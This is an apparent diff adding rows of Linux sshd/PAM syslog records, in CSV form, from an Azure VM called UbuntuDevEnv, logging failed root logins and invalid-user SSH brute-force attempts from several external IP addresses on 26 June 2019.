+13386,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:08,UbuntuDevEnv,2019-06-26 04:39:08,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 32527 ssh2 [preauth],129736,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,32527,,
+13387,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:08,UbuntuDevEnv,2019-06-26 04:39:08,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 32527 ssh2],129736,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,32527,,
+13388,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:11,UbuntuDevEnv,2019-06-26 04:39:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13389,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:13,UbuntuDevEnv,2019-06-26 04:39:12,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 38384 ssh2,129805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,38384,,
+13390,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:16,UbuntuDevEnv,2019-06-26 04:39:16,auth,UbuntuDevEnv,info,Invalid user am from 177.23.90.10 port 57224,129824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,am,177.23.90.1,57224,,
+13391,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:16,UbuntuDevEnv,2019-06-26 04:39:15,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 38384 ssh2,129805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,38384,,
+13392,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:16,UbuntuDevEnv,2019-06-26 04:39:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,129824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13393,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:16,UbuntuDevEnv,2019-06-26 04:39:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10,129824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,177.23.90.1,,0,
+13394,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:18,UbuntuDevEnv,2019-06-26 04:39:18,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 38384 ssh2,129805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,38384,,
+13395,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:19,UbuntuDevEnv,2019-06-26 04:39:18,auth,UbuntuDevEnv,info,Failed password for invalid user am from 177.23.90.10 port 57224 ssh2,129824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,am,177.23.90.1,57224,,
+13396,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:19,UbuntuDevEnv,2019-06-26 04:39:18,auth,UbuntuDevEnv,info,Disconnected from invalid user am 177.23.90.10 port 57224 [preauth],129824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,am,177.23.90.1,57224,,
+13397,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:19,UbuntuDevEnv,2019-06-26 04:39:18,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 57224:11: Bye Bye [preauth],129824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,57224,,
+13398,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:21,UbuntuDevEnv,2019-06-26 04:39:20,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 38384 ssh2,129805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,38384,,
+13399,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:22,UbuntuDevEnv,2019-06-26 04:39:21,auth,UbuntuDevEnv,info,Invalid user gateway from 200.6.188.38 port 21365,129849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gateway,200.6.188.3,21365,,
+13400,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:22,UbuntuDevEnv,2019-06-26 04:39:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,129849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13401,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:22,UbuntuDevEnv,2019-06-26 04:39:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,129849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+13402,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:22,UbuntuDevEnv,2019-06-26 04:39:22,auth,UbuntuDevEnv,info,Invalid user ubuntu from 119.123.240.8 port 40772,129847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,119.123.240.8,40772,,
+13403,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:22,UbuntuDevEnv,2019-06-26 04:39:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,129847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13404,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:22,UbuntuDevEnv,2019-06-26 04:39:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.123.240.8,129847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,,0,
+13405,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:23,UbuntuDevEnv,2019-06-26 04:39:23,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 38384 ssh2,129805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,38384,,
+13406,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:23,UbuntuDevEnv,2019-06-26 04:39:23,auth,UbuntuDevEnv,info,Failed password for invalid user gateway from 200.6.188.38 port 21365 ssh2,129849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gateway,200.6.188.3,21365,,
+13407,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:24,UbuntuDevEnv,2019-06-26 04:39:23,auth,UbuntuDevEnv,info,Disconnected from invalid user gateway 200.6.188.38 port 21365 [preauth],129849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gateway,200.6.188.3,21365,,
+13408,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:24,UbuntuDevEnv,2019-06-26 04:39:23,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 21365:11: Bye Bye [preauth],129849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,21365,,
+13409,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:25,UbuntuDevEnv,2019-06-26 04:39:24,auth,UbuntuDevEnv,info,Failed password for invalid user ubuntu from 119.123.240.8 port 40772 ssh2,129847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,119.123.240.8,40772,,
+13410,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:25,UbuntuDevEnv,2019-06-26 04:39:25,auth,UbuntuDevEnv,info,Disconnected from invalid user ubuntu 119.123.240.8 port 40772 [preauth],129847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,119.123.240.8,40772,,
+13411,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:25,UbuntuDevEnv,2019-06-26 04:39:25,auth,UbuntuDevEnv,info,Received disconnect from 119.123.240.8 port 40772:11: Bye Bye [preauth],129847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.123.240.8,40772,,
+13412,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:26,UbuntuDevEnv,2019-06-26 04:39:26,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 38384 ssh2,129805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,38384,,
+13413,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:26,UbuntuDevEnv,2019-06-26 04:39:26,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 38384: Too many authentication failures [preauth],129805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,38384,,
+13414,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:26,UbuntuDevEnv,2019-06-26 04:39:26,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 38384 ssh2 [preauth],129805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,38384,,
+13415,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:26,UbuntuDevEnv,2019-06-26 04:39:26,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13416,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:26,UbuntuDevEnv,2019-06-26 04:39:26,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,129805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13417,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:29,UbuntuDevEnv,2019-06-26 04:39:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129870,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13418,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:31,UbuntuDevEnv,2019-06-26 04:39:31,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 44344 ssh2,129870,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,44344,,
+13419,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:42,UbuntuDevEnv,2019-06-26 04:39:41,auth,UbuntuDevEnv,info,Invalid user artin from 5.135.161.72 port 52244,129918,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,artin,5.135.161.7,52244,,
+13420,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:42,UbuntuDevEnv,2019-06-26 04:39:39,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 44344 ssh2],129870,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,44344,,
+13421,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:42,UbuntuDevEnv,2019-06-26 04:39:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,129918,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+13422,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:42,UbuntuDevEnv,2019-06-26 04:39:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,129918,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13423,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:42,UbuntuDevEnv,2019-06-26 04:39:41,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 44344 ssh2,129870,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,44344,,
+13424,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:44,UbuntuDevEnv,2019-06-26 04:39:44,auth,UbuntuDevEnv,info,Failed password for invalid user artin from 5.135.161.72 port 52244 ssh2,129918,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,artin,5.135.161.7,52244,,
+13425,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:44,UbuntuDevEnv,2019-06-26 04:39:44,auth,UbuntuDevEnv,info,Disconnected from invalid user artin 5.135.161.72 port 52244 [preauth],129918,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,artin,5.135.161.7,52244,,
+13426,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:44,UbuntuDevEnv,2019-06-26 04:39:44,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 52244:11: Bye Bye [preauth],129918,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,52244,,
+13427,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:45,UbuntuDevEnv,2019-06-26 04:39:44,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 44344 ssh2,129870,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,44344,,
+13428,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:45,UbuntuDevEnv,2019-06-26 04:39:44,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 44344: Too many authentication failures [preauth],129870,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,44344,,
+13429,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:45,UbuntuDevEnv,2019-06-26 04:39:44,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 44344 ssh2 [preauth],129870,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,44344,,
+13430,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:45,UbuntuDevEnv,2019-06-26 04:39:44,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,129870,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13431,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:45,UbuntuDevEnv,2019-06-26 04:39:44,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129870,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13432,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:47,UbuntuDevEnv,2019-06-26 04:39:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13433,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:50,UbuntuDevEnv,2019-06-26 04:39:49,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 50095 ssh2,129938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,50095,,
+13434,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:50,UbuntuDevEnv,2019-06-26 04:39:50,auth,UbuntuDevEnv,info,Invalid user 123qwe from 95.216.195.95 port 47824,129956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,123qwe,95.216.195.9,47824,,
+13435,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:50,UbuntuDevEnv,2019-06-26 04:39:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,129956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+13436,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:50,UbuntuDevEnv,2019-06-26 04:39:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,129956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13437,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:52,UbuntuDevEnv,2019-06-26 04:39:52,auth,UbuntuDevEnv,info,Failed password for invalid user 123qwe from 95.216.195.95 port 47824 ssh2,129956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,123qwe,95.216.195.9,47824,,
+13438,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:52,UbuntuDevEnv,2019-06-26 04:39:52,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 47824:11: Bye Bye [preauth],129956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,47824,,
+13439,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:52,UbuntuDevEnv,2019-06-26 04:39:52,auth,UbuntuDevEnv,info,Disconnected from invalid user 123qwe 95.216.195.95 port 47824 [preauth],129956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,123qwe,95.216.195.9,47824,,
+13440,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:52,UbuntuDevEnv,2019-06-26 04:39:52,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 50095 ssh2,129938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,50095,,
+13441,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:01,UbuntuDevEnv,2019-06-26 04:40:01,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 50095 ssh2],129938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,50095,,
+13442,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:04,UbuntuDevEnv,2019-06-26 04:40:03,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,129938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13443,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:04,UbuntuDevEnv,2019-06-26 04:40:03,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 50095 ssh2 [preauth],129938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,50095,,
+13444,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:04,UbuntuDevEnv,2019-06-26 04:40:03,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 50095: Too many authentication failures [preauth],129938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,50095,,
+13445,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:04,UbuntuDevEnv,2019-06-26 04:40:03,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 50095 ssh2,129938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,50095,,
